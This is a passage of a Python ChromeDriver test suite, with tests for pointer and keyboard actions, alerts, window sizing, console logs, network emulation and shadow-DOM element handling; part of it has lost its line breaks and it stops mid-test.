    self.assertAlmostEqual(30, events[0]['y'], delta=1)
    self.assertEquals(1.0, round(events[0]['width'], 2))
    self.assertEquals(1.0, round(events[0]['height'], 2))
    self.assertEquals(0.55, round(events[0]['pressure'], 2))
    self.assertEquals(-36, events[0]['tiltX'])
    self.assertEquals(83, events[0]['tiltY'])
    self.assertEquals(266, events[0]['twist'])

  def testActionsPenPointerEventPressure(self):
    """Pen pressure defaults to 0.5 while down and 0 while hovering."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML = "<div>test</div>";
        var div = document.getElementsByTagName("div")[0];
        div.style["width"] = "100px";
        div.style["height"] = "100px";
        window.events = [];
        var event_list = ["pointerdown", "pointermove", "pointerup"];
        for (var i = 0; i < event_list.length; i++) {
          div.addEventListener(event_list[i], event => {
            window.events.push(
                {type: event.type,
                 x: event.clientX,
                 y: event.clientY,
                 pressure: event.pressure,
                 twist: event.twist});
          });
        }
        ''')
    time.sleep(1)
    actions = ({"actions": [{
      "type":"pointer",
      "actions":[{"type": "pointerMove", "x": 30, "y": 30},
                 {"type": "pointerDown", "button": 0, "twist":30},
                 {"type": "pointerMove", "x": 50, "y": 50},
                 {"type": "pointerUp", "button": 0}],
      "parameters": {"pointerType": "pen"},
      "id": "pointer1"}]})
    self._driver.PerformActions(actions)
    time.sleep(1)
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(4, len(events))
    self.assertEquals("pointermove", events[0]['type'])
    self.assertAlmostEqual(30, events[0]['x'], delta=1)
    self.assertAlmostEqual(30, events[0]['y'], delta=1)
    self.assertEquals(0.0, round(events[0]['pressure'], 2))
    self.assertEquals(0, events[0]['twist'])
    self.assertEquals("pointerdown", events[1]['type'])
    self.assertAlmostEqual(30, events[1]['x'], delta=1)
    self.assertAlmostEqual(30, events[1]['y'], delta=1)
    self.assertEquals(0.5, round(events[1]['pressure'], 2))
    self.assertEquals(30, events[1]['twist'])
    self.assertEquals("pointermove", events[2]['type'])
    self.assertAlmostEqual(50, events[2]['x'], delta=1)
    self.assertAlmostEqual(50, events[2]['y'], delta=1)
    self.assertEquals(0.5, round(events[2]['pressure'], 2))
    self.assertEquals(0, events[2]['twist'])
    self.assertEquals("pointerup", events[3]['type'])
    self.assertAlmostEqual(50, events[3]['x'], delta=1)
    self.assertAlmostEqual(50, events[3]['y'], delta=1)
    self.assertEquals(0.0, round(events[3]['pressure'], 2))
    self.assertEquals(0, events[3]['twist'])

  def testActionsPause(self):
    """Pauses in one input source stretch the shared tick for all sources."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML
            = "<input type='text' autofocus style='width:100px; height:100px'>";
        window.events = [];
        const input = document.getElementsByTagName("input")[0];
        const listener
            = e => window.events.push({type: e.type, time: e.timeStamp});
        input.addEventListener("keydown", listener);
        input.addEventListener("keyup", listener);
        input.addEventListener("mousedown", listener);
        ''')
    # Actions on 3 devices, across 6 ticks, with 200 ms pause at ticks 1 to 4.
    # Tick   "key" device        "pointer" device    "none" device
    #    0                       move
    #    1    pause 200 ms       pointer down        pause 100 ms
    #    2    "a" key down       pointer up          pause 200 ms
    #    3    "a" key up         pause 200 ms
    #    4    "b" key down       move 200 ms
    #    5    "b" key up
    actions = {'actions': [
        {
            'type': 'key',
            'id': 'key',
            'actions': [
                {'type': 'pause'},
                {'type': 'pause', 'duration': 200},
                {'type': 'keyDown', 'value': 'a'},
                {'type': 'keyUp', 'value': 'a'},
                {'type': 'keyDown', 'value': 'b'},
                {'type': 'keyUp', 'value': 'b'},
            ]
        },
        {
            'type': 'pointer',
            'id': 'mouse',
            'actions': [
                {'type': 'pointerMove', 'x': 50, 'y': 50},
                {'type': 'pointerDown', 'button': 0},
                {'type': 'pointerUp', 'button': 0},
                {'type': 'pause', 'duration': 200},
                {'type': 'pointerMove', 'duration': 200, 'x': 10, 'y': 10},
            ]
        },
        {
            'type': 'none',
            'id': 'none',
            'actions': [
                {'type': 'pause'},
                {'type': 'pause', 'duration': 100},
                {'type': 'pause', 'duration': 200},
            ]
        }
    ]}
    self._driver.PerformActions(actions)
    events = self._driver.ExecuteScript('return window.events')
    expected_events = ['mousedown', 'keydown', 'keyup', 'keydown', 'keyup']
    self.assertEquals(len(expected_events), len(events))
    for i in range(len(events)):
      self.assertEqual(expected_events[i], events[i]['type'])
      if i > 0:
        # Each tick carries at least one 200 ms pause, so consecutive
        # events must be at least that far apart.
        elapsed_time = events[i]['time'] - events[i-1]['time']
        self.assertGreaterEqual(elapsed_time, 200)

  def testReleaseActions(self):
    """ReleaseActions releases held keys and buttons in reverse order."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        '''
        document.body.innerHTML
            = "<input id='target' type='text' style='width:200px; height:200px'>";
        window.events = [];
        const recordKeyEvent = event => {
          window.events.push(
              {type: event.type, code: event.code});
        };
        const recordMouseEvent = event => {
          window.events.push(
              {type: event.type, x: event.clientX, y: event.clientY});
        };
        const target = document.getElementById('target');
        target.addEventListener('keydown', recordKeyEvent);
        target.addEventListener('keyup', recordKeyEvent);
        target.addEventListener('mousedown', recordMouseEvent);
        target.addEventListener('mouseup', recordMouseEvent);
        ''')
    # Move mouse to (50, 50), press a mouse button, and press a key.
    self._driver.PerformActions({'actions': [
        {
            'type': 'pointer',
            'id': 'mouse',
            'actions': [
                {'type': 'pointerMove', 'x': 50, 'y': 50},
                {'type': 'pointerDown', "button": 0}
            ]
        },
        {
            'type': 'key',
            'id': 'key',
            'actions': [
                {'type': 'pause'},
                {'type': 'pause'},
                {'type': 'keyDown', 'value': 'a'}
            ]
        }
    ]})
    events = self._driver.ExecuteScript('return window.events')
    self.assertEquals(2, len(events))
    self.assertEquals('mousedown', events[0]['type'])
    self.assertAlmostEqual(50, events[0]['x'], delta=1)
    self.assertAlmostEqual(50, events[0]['y'], delta=1)
    self.assertEquals('keydown', events[1]['type'])
    self.assertEquals('KeyA', events[1]['code'])
    self._driver.ReleaseActions()
    events = self._driver.ExecuteScript('return window.events')
    # The held key and button are released automatically.
    self.assertEquals(4, len(events))
    self.assertEquals('keyup', events[2]['type'])
    self.assertEquals('KeyA', events[2]['code'])
    self.assertEquals('mouseup', events[3]['type'])
    self.assertAlmostEqual(50, events[3]['x'], delta=1)
    self.assertAlmostEqual(50, events[3]['y'], delta=1)

  def testActionsCtrlCommandKeys(self):
    """Modifier-key action sequences can cut and paste between inputs."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('''
        document.write('<input type="text" id="text1" value="Hello World" />');
        document.write('<br/>')
        document.write('<input type="text" id="text2">');
        var text1 = document.getElementById("text1");
        text1.addEventListener("click", function() {
          var text1 = document.getElementById("text1");
          text1.value="new text";
        });
        ''')
    time.sleep(1)
    elem1 = self._driver.FindElement('css selector', '#text1')
    elem2 = self._driver.FindElement('css selector', '#text2')
    self.assertEquals("Hello World", elem1.GetProperty('value'))
    time.sleep(1)
    platform = util.GetPlatformName()
    # Control everywhere; Meta (command) on Mac.
    modifier_key = u'\uE009'
    if platform == 'mac':
      modifier_key = u'\uE03D'
    # This is a sequence of actions, first move the mouse to input field
    # "elem1", then press ctrl/cmd key and 'a' key to select all the text in
    # "elem1", and then press 'x' to cut the text and move the mouse to input
    # field "elem2" and press 'v' to paste the text, and at the end, we check
    # the texts in both input fields to see if the text are cut and pasted
    # correctly from "elem1" to "elem2".
    actions = ({'actions': [{
        'type': 'key',
        'id': 'key',
        'actions': [
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'keyDown', 'value': modifier_key},
            {'type': 'keyDown', 'value': 'a'},
            {'type': 'keyUp', 'value': 'a'},
            {'type': 'keyDown', 'value': 'x'},
            {'type': 'keyUp', 'value': 'x'},
            {'type': 'keyUp', 'value': modifier_key},
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'pause'},
            {'type': 'keyDown', 'value': modifier_key},
            {'type': 'keyDown', 'value': 'v'},
            {'type': 'keyUp', 'value': 'v'},
            {'type': 'keyUp', 'value': modifier_key}
        ]}, {
        'type':'pointer',
        'actions':[{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem1},
                   {'type': 'pointerDown', 'button': 0},
                   {'type': 'pointerUp', 'button': 0},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem2},
                   {'type': 'pointerDown', 'button': 0},
                   {'type': 'pointerUp', 'button': 0},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pause'},
                   {'type': 'pause'}],
        'parameters': {'pointerType': 'mouse'},
        'id': 'pointer1'}
    ]})
    self._driver.PerformActions(actions)
    time.sleep(1)
    self.assertEquals("", elem1.GetProperty('value'))
    self.assertEquals("new text", elem2.GetProperty('value'))
    time.sleep(1)

  def testPageLoadStrategyIsNormalByDefault(self):
    """Default pageLoadStrategy capability is 'normal'."""
    self.assertEquals('normal',
                      self._driver.capabilities['pageLoadStrategy'])

  def testClearElement(self):
    """Clear() empties a text input's value."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    text = self._driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text" value="abc">\';'
        'return document.getElementsByTagName("input")[0];')
    value = self._driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('abc', value)
    text.Clear()
    value = self._driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('', value)

  def testSendKeysToInputFileElement(self):
    """SendKeys on <input type=file> sets the (sanitized) file path."""
    file_name = os.path.join(_TEST_DATA_DIR, 'anchor_download_test.png')
    self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
        '/chromedriver/file_input.html'))
    elem = self._driver.FindElement('css selector', '#id_file')
    elem.SendKeys(file_name)
    text = self._driver.ExecuteScript(
        'var input = document.getElementById("id_file").value;'
        'return input;')
    # Browsers expose a fake C:\fakepath\ prefix instead of the real path.
    self.assertEquals('C:\\fakepath\\anchor_download_test.png', text);
    if not _ANDROID_PACKAGE_KEY:
      self.assertRaises(chromedriver.InvalidArgument,
                        elem.SendKeys, "/blah/blah/blah")

  def testSendKeysToNonTypeableInputElement(self):
    """SendKeys sets the value of non-typeable inputs such as color."""
    self._driver.Load("about:blank")
    self._driver.ExecuteScript(
        "document.body.innerHTML = '<input type=\"color\">';")
    elem = self._driver.FindElement('tag name', 'input');
    input_value = '#7fffd4'
    elem.SendKeys(input_value)
    value = elem.GetProperty('value')
    self.assertEquals(input_value, value)

  def testSendKeysNonBmp(self):
    """Characters outside the Basic Multilingual Plane can be typed."""
    self._driver.Load(ChromeDriverTest.GetHttpUrlForFile(
        '/chromedriver/two_inputs.html'))
    elem = self._driver.FindElement('css selector', '#first')
    expected = u'T\U0001f4a9XL\u0436'.encode('utf-8')
    elem.SendKeys(expected)
    actual = elem.GetProperty('value').encode('utf-8')
    self.assertEquals(expected, actual)

  def testGetElementAttribute(self):
    """GetAttribute returns an element's HTML attribute value."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/attribute_colon_test.html'))
    elem = self._driver.FindElement("css selector", "*[name='phones']")
    self.assertEquals('3', elem.GetAttribute('size'))

  def testGetElementProperty(self):
    """GetProperty returns an element's DOM property value."""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/two_inputs.html'))
    elem = self._driver.FindElement("css selector", "#first")
    self.assertEquals('text', elem.GetProperty('type'))
    self.assertEquals('first', elem.GetProperty('id'))

  def testGetElementSpecialCharAttribute(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/attribute_colon_test.html'))
    elem = self._driver.FindElement("css selector", "*[name='phones']")
    # Attribute names containing ':' must round-trip unmodified.
    self.assertEquals('colonvalue', elem.GetAttribute('ext:qtip'))

  def testGetCurrentUrl(self):
    """GetCurrentUrl reports the top-level URL, even inside a frame."""
    url = self.GetHttpUrlForFile('/chromedriver/frame_test.html')
    self._driver.Load(url)
    self.assertEquals(url, self._driver.GetCurrentUrl())
    self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
    self.assertEquals(url, self._driver.GetCurrentUrl())

  def testGoBackAndGoForward(self):
    """GoBack/GoForward complete without error."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.GoBack()
    self._driver.GoForward()

  def testDontGoBackOrGoForward(self):
    """Back/forward with no history entries is a no-op."""
    # We need to run this test in a new tab so that it is isolated from previous
    # test runs.
    old_windows = self._driver.GetWindowHandles()
    self._driver.ExecuteScript('window.open("about:blank")')
    new_window = self.WaitForNewWindow(self._driver, old_windows)
    self._driver.SwitchToWindow(new_window)
    self.assertEquals('about:blank', self._driver.GetCurrentUrl())
    self._driver.GoBack()
    self.assertEquals('about:blank', self._driver.GetCurrentUrl())
    self._driver.GoForward()
    self.assertEquals('about:blank', self._driver.GetCurrentUrl())

  def testBackNavigationAfterClickElement(self):
    """GoBack after a click-driven navigation returns to the origin page."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
    link = self._driver.FindElement('css selector', '#l1')
    link.Click()
    self._driver.GoBack()
    self.assertNotEqual('data:,', self._driver.GetCurrentUrl())
    self.assertEquals(self.GetHttpUrlForFile('/chromedriver/link_nav.html'),
                      self._driver.GetCurrentUrl())

  def testAlertHandlingOnPageUnload(self):
    """A beforeunload dialog raised by GoBack can be accepted."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
    # A user gesture is required before beforeunload dialogs are shown.
    self._driver.FindElement('tag name', 'body').Click()
    self._driver.GoBack()
    self.assertTrue(self._driver.IsAlertOpen())
    self._driver.HandleAlert(True)
    self.assertFalse(self._driver.IsAlertOpen())

  def testRefresh(self):
    """Refresh completes without error."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.Refresh()

  def testAlert(self):
    """Dismissing a confirm() dialog makes it return false."""
    self.assertFalse(self._driver.IsAlertOpen())
    self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
    self.assertTrue(self._driver.IsAlertOpen())
    self.assertEquals('HI', self._driver.GetAlertMessage())
    self._driver.HandleAlert(False)
    self.assertFalse(self._driver.IsAlertOpen())
    self.assertEquals(False,
                      self._driver.ExecuteScript('return window.confirmed'))

  def testSendTextToAlert(self):
    """Prompt dialogs accept text; confirm/beforeunload dialogs do not."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('prompt = window.prompt()')
    self.assertTrue(self._driver.IsAlertOpen())
    self._driver.HandleAlert(True, 'TextToPrompt')
    self.assertEquals('TextToPrompt',
                      self._driver.ExecuteScript('return prompt'))
    self._driver.ExecuteScript('window.confirmed = confirm(\'HI\');')
    self.assertRaises(chromedriver.ElementNotInteractable,
                      self._driver.HandleAlert,
                      True, 'textToConfirm')
    self._driver.HandleAlert(True) #for closing the previous alert.
    self._driver.ExecuteScript('window.onbeforeunload=function(){return true}')
    self._driver.FindElement('tag name', 'body').Click()
    self._driver.Refresh()
    self.assertTrue(self._driver.IsAlertOpen())
    self.assertRaises(chromedriver.UnsupportedOperation,
                      self._driver.HandleAlert,
                      True, 'textToOnBeforeUnload')

  def testAlertOnNewWindow(self):
    """An alert fired during a new window's load can be handled."""
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    old_windows = self._driver.GetWindowHandles()
    self._driver.ExecuteScript("window.open('%s')" %
        self.GetHttpUrlForFile('/chromedriver/alert_onload.html'))
    new_window = self.WaitForNewWindow(self._driver, old_windows)
    self.assertNotEqual(None, new_window)
    self._driver.SwitchToWindow(new_window)
    self.assertTrue(self._driver.IsAlertOpen())
    self._driver.HandleAlert(False)
    self.assertFalse(self._driver.IsAlertOpen())

  def testShouldHandleNewWindowLoadingProperly(self):
    """Tests that ChromeDriver determines loading correctly for new windows."""
    self._http_server.SetDataForPath(
        '/newwindow',
        """
        <html>
        <body>
        <a href='%s' target='_blank'>new window/tab</a>
        </body>
        </html>""" % self._sync_server.GetUrl())
    self._driver.Load(self._http_server.GetUrl() + '/newwindow')
    old_windows = self._driver.GetWindowHandles()
    self._driver.FindElement('tag name', 'a').Click()
    new_window = self.WaitForNewWindow(self._driver, old_windows)
    self.assertNotEqual(None, new_window)
    # The original window is idle; only the new one is still loading
    # (the sync server has not responded yet).
    self.assertFalse(self._driver.IsLoading())
    self._driver.SwitchToWindow(new_window)
    self.assertTrue(self._driver.IsLoading())
    self._sync_server.RespondWithContent('<html>new window</html>')
    self._driver.ExecuteScript('return 1')  # Shouldn't hang.
def testPopups(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) old_handles = self._driver.GetWindowHandles() self._driver.ExecuteScript('window.open("about:blank")') new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) def testNoSuchFrame(self): self.assertRaises(chromedriver.NoSuchFrame, self._driver.SwitchToFrame, 'nosuchframe') self.assertRaises(chromedriver.NoSuchFrame, self._driver.SwitchToFrame, self._driver.FindElement('tag name', 'body')) def testWindowPosition(self): rect = self._driver.GetWindowRect() self._driver.SetWindowRect(None, None, rect[2], rect[3]) self.assertEquals(rect, self._driver.GetWindowRect()) # Resize so the window isn't moved offscreen. # See https://bugs.chromium.org/p/chromedriver/issues/detail?id=297. self._driver.SetWindowRect(640, 400, None, None) self._driver.SetWindowRect(None, None, 100, 200) self.assertEquals([640, 400, 100, 200], self._driver.GetWindowRect()) def testWindowSize(self): rect = self._driver.GetWindowRect() self._driver.SetWindowRect(rect[0], rect[1], None, None) self.assertEquals(rect, self._driver.GetWindowRect()) self._driver.SetWindowRect(640, 400, None, None) self.assertEquals([640, 400, rect[2], rect[3]], self._driver.GetWindowRect()) def testWindowRect(self): old_window_rect = self._driver.GetWindowRect() self._driver.SetWindowRect(*old_window_rect) self.assertEquals(self._driver.GetWindowRect(), old_window_rect) target_window_rect = [640, 400, 100, 200] target_window_rect_dict = {'width': 640, 'height': 400, 'x': 100, 'y': 200} returned_window_rect = self._driver.SetWindowRect(*target_window_rect) self.assertEquals(self._driver.GetWindowRect(), target_window_rect) self.assertEquals(returned_window_rect, target_window_rect_dict) def testWindowMaximize(self): old_rect_list = [640, 400, 100, 200] self._driver.SetWindowRect(*old_rect_list) new_rect = self._driver.MaximizeWindow() new_rect_list = [ new_rect['width'], 
new_rect['height'], new_rect['x'], new_rect['y'] ] self.assertNotEqual(old_rect_list, new_rect_list) self._driver.SetWindowRect(*old_rect_list) self.assertEquals(old_rect_list, self._driver.GetWindowRect()) def testWindowMinimize(self): handle_prefix = "CDwindow-" handle = self._driver.GetCurrentWindowHandle() target = handle[len(handle_prefix):] self._driver.SetWindowRect(640, 400, 100, 200) rect = self._driver.MinimizeWindow() expected_rect = {u'y': 200, u'width': 640, u'height': 400, u'x': 100} #check it returned the correct rect for key in expected_rect.keys(): self.assertEquals(expected_rect[key], rect[key]) # check its minimized res = self._driver.SendCommandAndGetResult('Browser.getWindowForTarget', {'targetId': target}) self.assertEquals('minimized', res['bounds']['windowState']) def testWindowFullScreen(self): old_rect_list = [640, 400, 100, 200] self._driver.SetWindowRect(*old_rect_list) self.assertEquals(self._driver.GetWindowRect(), old_rect_list) new_rect = self._driver.FullScreenWindow() new_rect_list = [ new_rect['width'], new_rect['height'], new_rect['x'], new_rect['y'] ] self.assertNotEqual(old_rect_list, new_rect_list) self._driver.SetWindowRect(*old_rect_list) for i in range(10): if old_rect_list == self._driver.GetWindowRect(): break time.sleep(0.1) self.assertEquals(old_rect_list, self._driver.GetWindowRect()) def testConsoleLogSources(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html')) logs = self._driver.GetLog('browser') self.assertEqual('javascript', logs[0]['source']) self.assertTrue('TypeError' in logs[0]['message']) self.assertEqual('network', logs[1]['source']) self.assertTrue('nonexistent.png' in logs[1]['message']) self.assertTrue('404' in logs[1]['message']) # Sometimes, we also get an error for a missing favicon. 
if len(logs) > 2: self.assertEqual('network', logs[2]['source']) self.assertTrue('favicon.ico' in logs[2]['message']) self.assertTrue('404' in logs[2]['message']) self.assertEqual(3, len(logs)) else: self.assertEqual(2, len(logs)) def testPendingConsoleLog(self): new_logs = [""] def GetPendingLogs(driver): response = driver.GetLog('browser') new_logs[0] = [x for x in response if x['source'] == 'console-api'] return new_logs[0] self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/pending_console_log.html')) logs = self._driver.GetLog('browser') self.assertEqual('console-api', logs[0]['source']) self.assertTrue('"InitialError" 2018 "Third"' in logs[0]['message']) self.WaitForCondition(lambda: len(GetPendingLogs(self._driver)) > 0 , 6) self.assertEqual('console-api', new_logs[0][0]['source']) self.assertTrue('"RepeatedError" "Second" "Third"' in new_logs[0][0]['message']) def testGetLogOnClosedWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.WaitForNewWindow(self._driver, old_handles) self._driver.CloseWindow() try: self._driver.GetLog('browser') except chromedriver.ChromeDriverException as e: self.fail('exception while calling GetLog on a closed tab: ' + e.message) def testGetLogOnWindowWithAlert(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript('alert("alert!");') try: self._driver.GetLog('browser') except Exception as e: self.fail(e.message) def testDoesntHangOnDebugger(self): self._driver.Load('about:blank') self._driver.ExecuteScript('debugger;') def testChromeDriverSendLargeData(self): script = 'return "0".repeat(10e6);' lots_of_data = self._driver.ExecuteScript(script) self.assertEquals('0'.zfill(int(10e6)), lots_of_data) def testEmulateNetworkConditions(self): # Network conditions must be set before it can be retrieved. 
self.assertRaises(chromedriver.UnknownError, self._driver.GetNetworkConditions) # DSL: 2Mbps throughput, 5ms RTT latency = 5 throughput = 2048 * 1024 self._driver.SetNetworkConditions(latency, throughput, throughput) network = self._driver.GetNetworkConditions() self.assertEquals(latency, network['latency']); self.assertEquals(throughput, network['download_throughput']); self.assertEquals(throughput, network['upload_throughput']); self.assertEquals(False, network['offline']); # Network Conditions again cannot be retrieved after they've been deleted. self._driver.DeleteNetworkConditions() self.assertRaises(chromedriver.UnknownError, self._driver.GetNetworkConditions) def testEmulateNetworkConditionsName(self): # DSL: 2Mbps throughput, 5ms RTT # latency = 5 # throughput = 2048 * 1024 self._driver.SetNetworkConditionsName('DSL') network = self._driver.GetNetworkConditions() self.assertEquals(5, network['latency']); self.assertEquals(2048*1024, network['download_throughput']); self.assertEquals(2048*1024, network['upload_throughput']); self.assertEquals(False, network['offline']); def testEmulateNetworkConditionsSpeed(self): # Warm up the browser. self._http_server.SetDataForPath( '/', "<html><body>blank</body></html>") self._driver.Load(self._http_server.GetUrl() + '/') # DSL: 2Mbps throughput, 5ms RTT latency = 5 throughput_kbps = 2048 throughput = throughput_kbps * 1024 self._driver.SetNetworkConditions(latency, throughput, throughput) _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" _1_megabyte = _32_bytes * 32768 self._http_server.SetDataForPath( '/1MB', "<html><body>%s</body></html>" % _1_megabyte) start = monotonic() self._driver.Load(self._http_server.GetUrl() + '/1MB') finish = monotonic() duration = finish - start actual_throughput_kbps = 1024 / duration self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5) self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5) def testEmulateNetworkConditionsNameSpeed(self): # Warm up the browser. 
self._http_server.SetDataForPath( '/', "<html><body>blank</body></html>") self._driver.Load(self._http_server.GetUrl() + '/') # DSL: 2Mbps throughput, 5ms RTT throughput_kbps = 2048 throughput = throughput_kbps * 1024 self._driver.SetNetworkConditionsName('DSL') _32_bytes = " 0 1 2 3 4 5 6 7 8 9 A B C D E F" _1_megabyte = _32_bytes * 32768 self._http_server.SetDataForPath( '/1MB', "<html><body>%s</body></html>" % _1_megabyte) start = monotonic() self._driver.Load(self._http_server.GetUrl() + '/1MB') finish = monotonic() duration = finish - start actual_throughput_kbps = 1024 / duration self.assertLessEqual(actual_throughput_kbps, throughput_kbps * 1.5) self.assertGreaterEqual(actual_throughput_kbps, throughput_kbps / 1.5) def testEmulateNetworkConditionsOffline(self): # A workaround for crbug.com/177511; when setting offline, the throughputs # must be 0. self._driver.SetNetworkConditions(0, 0, 0, offline=True) self.assertRaises(chromedriver.ChromeDriverException, self._driver.Load, self.GetHttpUrlForFile('/chromedriver/page_test.html')) # The "X is not available" title is set after the page load event fires, so # we have to explicitly wait for this to change. We can't rely on the # navigation tracker to block the call to Load() above. self.WaitForCondition(lambda: 'is not available' in self._driver.GetTitle()) def testSendCommandAndGetResult(self): """Sends a custom command to the DevTools debugger and gets the result""" self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) params = {} document = self._driver.SendCommandAndGetResult('DOM.getDocument', params) self.assertTrue('root' in document) def _FindElementInShadowDom(self, css_selectors): """Find an element inside shadow DOM using CSS selectors. The last item in css_selectors identify the element to find. 
All preceding selectors identify the hierarchy of shadow hosts to traverse in order to reach the target shadow DOM.""" current = None for selector in css_selectors: if current is None: # First CSS selector, start from root DOM. current = self._driver else: # current is a shadow host selected previously. # Enter the corresponding shadow root. current = self._driver.ExecuteScript( 'return arguments[0].shadowRoot', current) current = current.FindElement('css selector', selector) return current def testShadowDomFindElement(self): """Checks that chromedriver can find elements in a shadow DOM.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) self.assertTrue(self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"])) def testShadowDomFindChildElement(self): """Checks that chromedriver can find child elements from a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#childDiv"]) self.assertTrue(elem.FindElement("css selector", "#textBox")) def testShadowDomFindElementFailsFromRoot(self): """Checks that chromedriver can't find elements in a shadow DOM from root.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # can't find element from the root without /deep/ with self.assertRaises(chromedriver.NoSuchElement): self._driver.FindElement("css selector", "#textBox") def testShadowDomText(self): """Checks that chromedriver can find extract the text from a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#heading"]) self.assertEqual("Child", elem.GetText()) def testShadowDomSendKeys(self): """Checks that chromedriver can call SendKeys on a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = 
self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"]) elem.SendKeys("bar") self.assertEqual("foobar", self._driver.ExecuteScript( 'return arguments[0].value;', elem)) def testShadowDomClear(self): """Checks that chromedriver can call Clear on a shadow DOM element.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#textBox"]) elem.Clear() self.assertEqual("", self._driver.ExecuteScript( 'return arguments[0].value;', elem)) def testShadowDomClick(self): """Checks that chromedriver can call Click on an element in a shadow DOM.""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # Wait for page to stabilize. See https://crbug.com/954553#c7 time.sleep(1) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) elem.Click() # the button's onClicked handler changes the text box's value self.assertEqual("Button Was Clicked", self._driver.ExecuteScript( 'return arguments[0].value;', self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#textBox"]))) def testShadowDomActionClick(self): '''Checks that ChromeDriver can use actions API to click on an element in a shadow DOM.''' self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) # Wait for page to stabilize. 
See https://crbug.com/954553#c7 time.sleep(1) elem = self._FindElementInShadowDom( ['#innerDiv', '#parentDiv', '#button']) actions = ({'actions': [{ 'type': 'pointer', 'actions': [{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}], 'id': 'pointer1'}]}) self._driver.PerformActions(actions) # the button's onClicked handler changes the text box's value self.assertEqual('Button Was Clicked', self._driver.ExecuteScript( 'return arguments[0].value;', self._FindElementInShadowDom(['#innerDiv', '#parentDiv', '#textBox']))) def testShadowDomStaleReference(self): """Checks that trying to manipulate shadow DOM elements that are detached from the document raises a StaleElementReference exception""" self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/shadow_dom_test.html')) elem = self._FindElementInShadowDom( ["#innerDiv", "#parentDiv", "#button"]) self._driver.ExecuteScript( 'document.querySelector("#outerDiv").innerHTML="<div/>";') with self.assertRaises(chromedriver.StaleElementReference): elem.Click() def testTouchDownMoveUpElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/touch_action_tests.html')) target = self._driver.FindElement('css selector', '#target') location = target.GetLocation() self._driver.TouchDown(location['x'], location['y']) events = self._driver.FindElement('css selector', '#events') self.assertEquals('events: touchstart', events.GetText()) self._driver.TouchMove(location['x'] + 1, location['y'] + 1) self.assertEquals('events: touchstart touchmove', events.GetText()) self._driver.TouchUp(location['x'] + 1, location['y'] + 1) self.assertEquals('events: touchstart touchmove touchend', events.GetText()) def testGetElementRect(self): self._driver.Load(self.GetHttpUrlForFile( 